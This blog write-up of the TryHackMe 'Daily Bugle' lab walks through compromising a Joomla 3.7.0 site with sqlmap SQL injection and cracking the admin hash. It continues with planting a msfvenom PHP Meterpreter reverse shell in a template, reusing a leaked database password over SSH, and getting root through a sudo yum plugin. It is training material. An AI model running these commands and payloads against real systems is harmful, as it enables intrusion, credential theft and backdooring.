The Daily Bugle is a fictional tabloid news paper in the Spiderman Universe (Wikipedia Oct. 15, 2022 revision). It is also the inspiration for the TryHackMe room created by the TryHackMe staff that challenges its users to “[c]ompromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum” (“tryhackme” 2020). In this article, I discuss the methodology that I use to gain initial access to the system, steal credentials to gain further access and then employ privilege escalation methods to get root access.
Before proceeding, I must define the objectives of this room. The ultimate goal is to dump the contents of a file of a user with lesser privileges called user.txt and then to invoke privilege escalation techniques to dump the contents of a root file called root.txt.
I will prepare by editing the /etc/hosts file on my AttackBox to include a pseudo-domain called dailybugle.thm that will point to the dynamic IP address of the target system. After clicking the green-coloured “[s]tart [m]achine” on the top-right corner of the first task, I proceeded to probe the system for a means by which I can gain initial access.
I typed the dailybugle.thm domain into the address bar of a web browser in my AttackBox to see if there is a website running on it. There indeed is a website running and figure 1 depicts the web page returned:
Proceeding with further probing of this system, I used nmap (n.d.) to enumerate the services running on the system and gobuster (Mehlmauer et al. n.d.) to find any hidden sub-directories on the port 80 web server:
┌──(dna@deniers)-[~/dailybugle]
└─$ sudo nmap -sT -A -v -Pn -p- -O -sC -oX tcp_scan.xml --max-scan-delay=5s -T4 dailybugle.thm
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at [redacted]
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Initiating Connect Scan at 06:01
Scanning dailybugle.thm [65535 ports]
[… snip …]
┌──(dna@deniers)-[~]
└─$ gobuster dir -u http://dailybugle.thm -w ./directories.txt -x php,bak,htm,html -t 40 -k
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://dailybugle.thm
[+] Method: GET
[+] Threads: 40
[+] Wordlist: ./directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,bak,htm
[+] Timeout: 10s
===============================================================
[redacted] Starting gobuster in directory enumeration mode
===============================================================
[… snip …]
While these scanners were running, I decided to manually inspect the web application. Specifically, I inspected the HTML source code of the home page and found an interesting snippet nested in the <head> tag:
[... snip ...]
<base href=”http://dailybugle.thm/” />
<meta name=”description” content=”New York City tabloid newspaper” />
<meta name=”generator” content=”Joomla! – Open Source Content Management” />
<title>Home</title>
[… snip …]
There is a <meta> tag stating that the generator is the Joomla! (n.d.) content management system. Knowing this, I can craft my attacks against the web application to specifically exploit Joomla! vulnerabilities should I choose to attack the web service. After the nmap scan completed, I used xsltproc (n.d.) to convert its XML output to a readable HTML document:
┌──(dna@deniers)-[~/dailybugle]
└─$ xsltproc tcp_scan.xml -o tcp_scan.html
┌──(dna@deniers)-[~/dailybugle]
└─$
Figure 2 depicts the rendered HTML of the port scan:
The target system is running the following services:
Furthermore it is likely that the target system is running CentOS (n.d.) Linux. The following is the results from the gobuster scan:
[... snip ...]
/.htm (Status: 403) [Size: 206]
/images (Status: 301) [Size: 237] [–> http://dailybugle.thm/images/]
/index.php (Status: 200) [Size: 9286]
/.html (Status: 403) [Size: 207]
/media (Status: 301) [Size: 236] [–> http://dailybugle.thm/media/]
/templates (Status: 301) [Size: 240] [–> http://dailybugle.thm/templates/]
/modules (Status: 301) [Size: 238] [–> http://dailybugle.thm/modules/]
/bin (Status: 301) [Size: 234] [–> http://dailybugle.thm/bin/]
/plugins (Status: 301) [Size: 238] [–> http://dailybugle.thm/plugins/]
/includes (Status: 301) [Size: 239] [–> http://dailybugle.thm/includes/]
/language (Status: 301) [Size: 239] [–> http://dailybugle.thm/language/]
/components (Status: 301) [Size: 241] [–> http://dailybugle.thm/components/]
/cache (Status: 301) [Size: 236] [–> http://dailybugle.thm/cache/]
/libraries (Status: 301) [Size: 240] [–> http://dailybugle.thm/libraries/]
/tmp (Status: 301) [Size: 234] [–> http://dailybugle.thm/tmp/]
/layouts (Status: 301) [Size: 238] [–> http://dailybugle.thm/layouts/]
/administrator (Status: 301) [Size: 244] [–> http://dailybugle.thm/administrator/]
/configuration.php (Status: 200) [Size: 0]
/cli (Status: 301) [Size: 234] [–> http://dailybugle.thm/cli/]
/.html (Status: 403) [Size: 207]
/.htm (Status: 403) [Size: 206]
Progress: 515433 / 1038220 (49.65%)[ERROR] [redacted] [!] Get “http://dailybugle.thm/subrelated.bak”: context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] [redacted] [!] Get “http://dailybugle.thm/subrelated.htm”: context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] [redacted] [!] Get “http://dailybugle.thm/subtestimonials.php”: context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[… snip …]
Note that I have redacted some error messages for the sake of readability. The output revealed some interesting sub-directories like the /administrator, /plugins and /modules, which I recognise as being typically associated with the Joomla! content management system (see Joomla! n.d.-b, n.d.-c). This gives me more confidence that Joomla! is in fact the underlying content management system for the web application.
To further probe the target system’s Joomla! instance, I will use the joomscan (Espargham et al. n.d.) utility to test for vulnerabilities and gather more information on it. The following is an abridged output of joomscan:
[... snip ...]
Processing http://dailybugle.thm …
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://dailybugle.thm/administrator/components
http://dailybugle.thm/administrator/modules
http://dailybugle.thm/administrator/templates
http://dailybugle.thm/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://dailybugle.thm/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dailybugle.thm/robots.txt
Interesting path found from robots.txt
http://dailybugle.thm/joomla/administrator/
[… snip …]
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/dailybugle.thm/
[… snip …]
While joomscan did not find any vulnerabilities, it did report a version of 3.7.0. From this, I can try to manually scan for vulnerabilities based on previous research from other security professionals. After doing some cursory research, I discovered that Joomla! 3.7.0 is vulnerable to an SQL injection regarding its com_fields module (Lino 2017).
At this point, I struggled to exploit the vulnerability. I decided to reference the work of another security professional in the exploitation of this vulnerability. Specifically, I referenced “MurilandOracle” (2020) for the details on exploiting the SQL injection vulnerability. I think that I struggled in expressing the URL to attack; I was faced with a URL in the form of:
http://dailybugle.thm/index.php/2-uncategorised/1-spider-man-robs-bank
However, “MurilandOracle” (2020) gives the following URL to attack and notes that it “temperamental” — meaning that it is inconsistent in its successfulness:
http://dailybugle.thm/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml
I will start by executing the exploit with sqlmap (Stampar et al. n.d.). The authors of this room challenges their users to “use a python script,” which I presume means develop their own proof-of-concept. So I will gather debugging information and return to this exploit development problem in the future. I then instructed sqlmap to dump the __users database:
┌──(dna@deniers)-[~/dailybugle]
└─$ sqlmap -u "http://dailybugle.thm/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' --dump -v3
[… snip …]
[12:12:02] [DEBUG] cleaning up configuration parameters
[12:12:02] [DEBUG] setting the HTTP timeout
[12:12:02] [DEBUG] setting the HTTP User-Agent header
[12:12:02] [DEBUG] loading random HTTP User-Agent header(s) from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[12:12:02] [INFO] fetched random HTTP User-Agent header value ‘Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/526.3 (KHTML, like Gecko) Chrome/14.0.564.21 Safari/526.3’ from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[12:12:02] [DEBUG] creating HTTP requests opener object
[12:12:03] [DEBUG] setting the HTTP Referer header to the target URL
[12:12:03] [DEBUG] setting the HTTP Host header to the target URL
[12:12:03] [DEBUG] resolving hostname ‘dailybugle.thm’
[12:12:03] [INFO] testing connection to the target URL
[12:12:03] [DEBUG] declared web page charset ‘utf-8’
[12:12:03] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[12:12:03] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own (‘eaa83fe8b963ab08ce9ab7d4a798de05=sv4pts6c7sg…pen4oo6pt1’). Do you want to use those [Y/n]
[… snip …]
The --risk and --level parameters have been elevated so this process may take longer to evaluate the SQL injection vector. I also used the --v3 flag to print out the payload requests onto the console for further research. After a while of this process, sqlmap returned the following entry from the __user table — as depicted by table 1:
With user credentials in mind, I am closer to being able to log in to the Joomla! Super Administrator area. But I first need to work out the password.
To my knowledge, there are at least two means by which to bypass an Joomla! administrator login form; the first being resetting it. The __user table has a column that is used to hold a random string if a password reset is requested.
Unfortunately, I do not think that exploit applies to this version of Joomla!, so I will go with the next move: to crack the hashed password. I started by using a hash identifier tool (Hashes.com n.d.) to work out what kind of hash that this version of Joomla! uses. Figure 3 depicts the websites guesses as to what kind of hash that I was dealing with:
It identified the following algorithms used to hash the passwords: bcrypt($plaintext), Blowfish and bcrypt(md5($plaintext)) — which stand for the bcrypt algorithm (Provos & Mazieres 1999), the Blowfish algorithm (Schneier 1994) and another instance of bcrypt with an MD5 hash nested in it (Provos & Mazieres 1999; Rivest 1992).
I then outputted the hash into a file called joomla_hash and employed John The Ripper (Openwall n.d.) to crack the hashed password:
┌──(dna@deniers)-[~/dailybugle]
└─$ john joomla_hash --wordlist=./rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:38 0.02% 0g/s 76.68p/s 76.68c/s 76.68C/s raluca..maricar
0g 0:00:04:00 0.10% 0g/s 74.66p/s 74.66c/s 74.66C/s 121981..020891
spiderman123 (?) <-- cracked password
1g 0:00:10:59 DONE 0.001517g/s 71.06p/s 71.06c/s 71.06C/s sweetsmile..speciala
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(dna@deniers)-[~/dailybugle]
└─$
I then proceeded to enter the stolen credentials into the website’s /administrator log in page — as depicted by figure 4:
I typed in the username (Fig. 4a), the password (Fig. 4b, “spiderman”) and clicked on the “[l]og in” button (Fig. 4c). After doing so, I was presented with the Joomla! control panel with super administrator privileges — as depicted by figure 5:
I decided to upload a PHP web shell (Prodromou 2020) to initiate a reverse connection via Metasploit’s Meterpreter (Mittal 2011). I used the following command to generate a reverse Meterpreter via a PHP script.
┌──(dna@deniers)-[~/dailybugle]
└─$ sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=dailybugle.thm LPORT=4444 -f raw -o meterpreter.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes
Saved as: meterpreter.php
[… snip …]
I then started Metasploit via msfconsole and had it listen for the reverse connection through meterpreter.php:
┌──(dna@deniers)-[~/dailybugle]
└─$ sudo msfconsole
[sudo] password for dna:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker.thm
LHOST => attacker.thm
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on attacker.thm:4444
[… snip …]
My strategy to install the meterpreter.php was to modify a Joomla! template to include the script. For the sake of succinctness and readability, I will skip this section but recommend a writeup by Williams (2019) demonstrarting this method for a different capture the flag puzzle involving installing a PHP backdoor onto a Joomla! content management system.
Specifically, I modified the “protostar” template and added a file called logging.php which will contain the meterpreter.php code. To get a reverse shell, I need to trigger the logging.php script to execute. This can be done with the curl (n.d.) utility:
┌──(dna@deniers)-[~/dailybugle]
└─$ curl http://dailybugle.thm/templates/protostar/logging.php
[… snip …]
In less than a minute, I received a reverse shell from the target system:
[*] Started reverse TCP handler on attacker.thm:4444
[*] Sending stage (39927 bytes) to dailybugle.thm
[*] Meterpreter session 1 opened (attacker.thm:4444 -> dailybugle.thm:42632) at [redacted]
meterpreter >
I once again referenced “MurilandOracle” (2020) for the procedure to locate the user’s flag file and used the following method: I will dump the configuration.php file of the target system’s to get a password for credential reuse reasons:
meterpreter > pwd
/var/www/html/templates/protostar
meterpreter > cd ../..
meterpreter > pwd
/var/www/html
meterpreter > cat configuration.php
<?php
class JConfig {
[… snip …]
public $host = ‘localhost’;
public $user = ‘root’;
public $password = ‘nv5uz9r3ZEDzVjNu’;
public $db = ‘joomla’;
[… snip …]
public $shared_session = ‘0’;
}meterpreter >
I can proceed to enumerate the users on the system by running an ls of the /home directory:
}meterpreter > ls /home
Listing: /home
==============
Mode Size Type Last modified Name
—- —- —- ————- —-
040700/rwx—— 99 dir 2019-12-15 19:47:48 -0500 jjameson
meterpreter >
I can infer that the target system has a user called jjameson and guess that their password is nv5uz9r3ZEDzVjNu. I can test this hypothesis by using the ssh utility to access their account:
┌──(dna㉿deniers)-[~/dailybugle]
└─$ ssh jjameson@dailybugle.thm
jjameson@dailybugle.thm's password:
Last login: Mon Dec 16 05:14:55 2019 from netwars
[jjameson@dailybugle ~]$
Now I can proceed to dump jjameson’s flag:
[jjameson@dailybugle ~]$ ls
user.txt
[jjameson@dailybugle ~]$ cat user.txt
[redacted]
[jjameson@dailybugle ~]$
Excellent.
I can now proceed to exploit a vulnerability on the target system to gain root access. I will try to exploit a sticky-bits-driven binary with root privileges (Carrigan 2020) and trick it to executing a shell. I can use the find command to probe the target system for files with the sticky-bit set and narrow the results down to binaries with root privileges:
[jjameson@dailybugle ~]$ find / -type f -perm /4000 -print 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
[jjameson@dailybugle ~]$
I will enumerate what binaries can be ran with sudo:
[jjameson@dailybugle ~]$ sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
[jjameson@dailybugle ~]$
The yum binary can be executed by sudo. I will use the guide supplied by GTFOBins (n.d.) to exploit yum to execute commands. First I will try to find the root.txt flag:
[jjameson@dailybugle ~]$ find / -type f -name root.txt -print 2>/dev/null
[jjameson@dailybugle ~]$
This search did not result in any useful information. Instead I will try to spawn an interactive root shell as opposed to my original plan (which was easier to implement: to execute a single cat root.txt command):
[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
> os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#
This is good. I can now proceed to dump the root.txt which contains the flag:
sh-4.2# cat /root/root.txt
[redacted]
sh-4.2#
Allora.
This was a moderately difficult TryHackMe room. As usual, I invoked an offensive security methodology of probing a boot2root target system for weaknesses that can be exploited to gain initial entry. I exploited a SQL injection vulnerability on an outdated Joomla! content management system, cracked its hashed passwords and then used that as a basis to gain entry to the Joomla! super administrator panel.
After that, I had to dump more configuration files to discover more about my target and then use that as a basis for reentry to the target system under different credentials. Finally, I exploited the package management system associated with CentOS with sudo privileges to gain an interactive root shell, giving myself total control over the target system.
Some takeaways are as follows:
jjameson’s.root account. In some cases, it may not be possible to gain root access to a target system, so an offensive security engineer will need to settle with whatever non-root privileges they can get.configuration.php file can have useful information regarding the target system. Be sure to add those to your “mind maps.” Furthermore, Joomla! can be easily hacked to store PHP scripts allowing for backdoors.I would like to thank MurilandOracle and Nick Williams for their very helpful writeups that I (occasionally 😉) referenced when doing this room. I will admit that I got stuck a few times along the way, and I could not have finished this room without their tutelage!
As usual, I just want to give a shout out to Mira Lazine for their amazing work in lefty spaces. She has done more than every techbro in Silly Con(artist) valley combined to make the world a little better. Go follow herself in her new Mastodon account ❤️
For readers who enjoy my work but have not yet signed up for Medium’s membership programme, I would appreciate it a lot if they could sign up through my referral link (it helps me financially ❤️): https://medium.com/membership/@EpsilonCalculus
Furthermore, for any readers who enjoy reading about my hacking writeups, I invite them to check out my technical writeups series made up of mostly CTF writeups, but has other computer and STEM content as well 😃
Apache HTTP service (v. 2.4.6). Change Log. Apache Lounge. Retrieved on Dec. 13, 2022 from: https://www.apachelounge.com/Changelog-2.4.html
Carrigan, T. (2020). Linux permissions: SUID, SGID, and sticky bit. Red Hat. Retrieved on Dec. 16, 2022 from: https://www.redhat.com/sysadmin/suid-sgid-sticky-bit
CentOS (n.d.). About CentOS. Retrieved on Dec. 13, 2022 from: https://www.centos.org/about/
curl (n.d.). Frequently Asked Questions. Retrieved on Dec. 16, 2022 from: https://curl.se/docs/faq.html
Dengeki Wiki (May 18, 2022 revision). Heaven’s Memo Pad. Retrieved on Dec. 17, 2022 from: https://dengeki.fandom.com/wiki/Heaven%27s_Memo_Pad?oldid=39308
Espargham et al. (n.d.). joomscan: OWASP Joomla Vulnerability Scanner Project. GitHub Repository. Retrieved on Dec. 13, 2022 from: https://github.com/OWASP/joomscan
GTFOBins (n.d.). yum. Retrieved on Dec. 16, 2022 from: https://gtfobins.github.io/gtfobins/yum/
Hashes.com (n.d.). Hash Type Identifier — Identify unknown hashes. Retrieved in Dec. 15, 2022 from: https://hashes.com/en/tools/hash_identifier
Joomla! (n.d.). Content Management System to build websites & apps. Retrieved in Dec. 13, 2022 from: https://www.joomla.org/about-joomla.html
Joomla! (n.d.-b). Administrator (Application). Retrieved on Dec. 13, 2022 from: https://docs.joomla.org/Administrator_(Application)
Joomla! (n.d.-c). Module. Retrieved on Dec. 13, 2022 from: https://docs.joomla.org/Module
Lino, M. (2017). Joomla! 3.7.0 — ‘com_fields’ SQL Injection. Exploit Database. Retrieved on Dec. 13, 2022 from: https://www.exploit-db.com/exploits/42033
MariaDB (n.d.). About MariaDB Server. Retrieved on Dec. 13, 2022 from: https://mariadb.org/about/
Mehlmauer et al. (n.d.). Gobuster v3.2.0: Directory/File, DNS and VHost busting tool written in Go. GitHub Repository. Retrieved on Dec. 13, 2022 from: https://github.com/OJ/gobuster
Mittal, S. (2011). Post Exploitation Using Meterpreter. Exploit Database. Retrieved on Dec. 16, 2022 from: https://www.exploit-db.com/docs/18229
“MurilandOracle” (2020). Daily Bugle — Write-up. Retrieved on Dec. 13, 2022 from: https://muirlandoracle.co.uk/2020/02/08/daily-bugle-write-up
MySQL (n.d.). About MySQL. Retrieved on Dec. 13, 2022 from: https://www.mysql.com/about/
nmap (n.d.). Nmap: the Network Mapper — Free Security Scanner. Retrieved in Dec. 13, 2022 from: https://nmap.org/
OpenSSH (v. 7.4). Release Notes. Retrieved on Dec. 13, 2022 from: https://www.openssh.com/txt/release-7.4
Openwall (n.d.). John the Ripper password cracker. Retrieved on Dec. 15, 2022 from: https://www.openwall.com/john/
Prodromou, A. (2020). An Introduction to Web Shells (Web Shells Part 1). Acunetix Blog. Retrieved on Dec. 16, 2022 from: https://www.acunetix.com/blog/articles/introduction-web-shells-part-1/
Provos, N. & Mazieres, D. (1999). Bcrypt Algorithm. USENIX Conference. Retrieved on Dec. 15, 2022 from: https://www.usenix.org/legacy/events/usenix99/provos/provos_html/node5.html
Rivest, R. (1992). The MD5 Message-Digest Algorithm. Network Working Group. Retrieved on Dec. 15, 2022 from: https://www.rfc-editor.org/rfc/rfc1321
Schneier, B. (1994). Description of a New Variable-Length Key, 64-Bit Block Cipher (Blowfish). Schneier on Security. Retrieved on Dec. 15, 2022 from: https://www.schneier.com/academic/archives/1994/09/description_of_a_new.html
Stampar et al. (n.d.). sqlmap: Automatic SQL injection and database takeover tool. GitHub Repository. Retrieved on Dec. 13, 2022 from: https://github.com/sqlmapproject/sqlmap
“tryhackme” (2020). Daily Bugle. TryHackMe. Retrieved on Dec. 17, 2022 from: https://tryhackme.com/room/dailybugle
Wikipedia (Oct. 15, 2022 revision). Daily Bugle. Retrieved on Dec. 17, 2022 from: https://en.wikipedia.org/w/index.php?title=Daily_Bugle&oldid=1116305493
Williams, N. (2019). Vulnhub Write-Up: — DC: 3. Independent Publication. Retrieved on Dec. 16, 2022 from: https://medium.com/@nickwilliams_/vulnerability-adventures-dc-3-416afe04c531
xsltproc (n.d.). xsltproc — command line xslt processor. Retrieved on Dec. 7, 2022 from: http://xmlsoft.org/xslt/xsltproc.html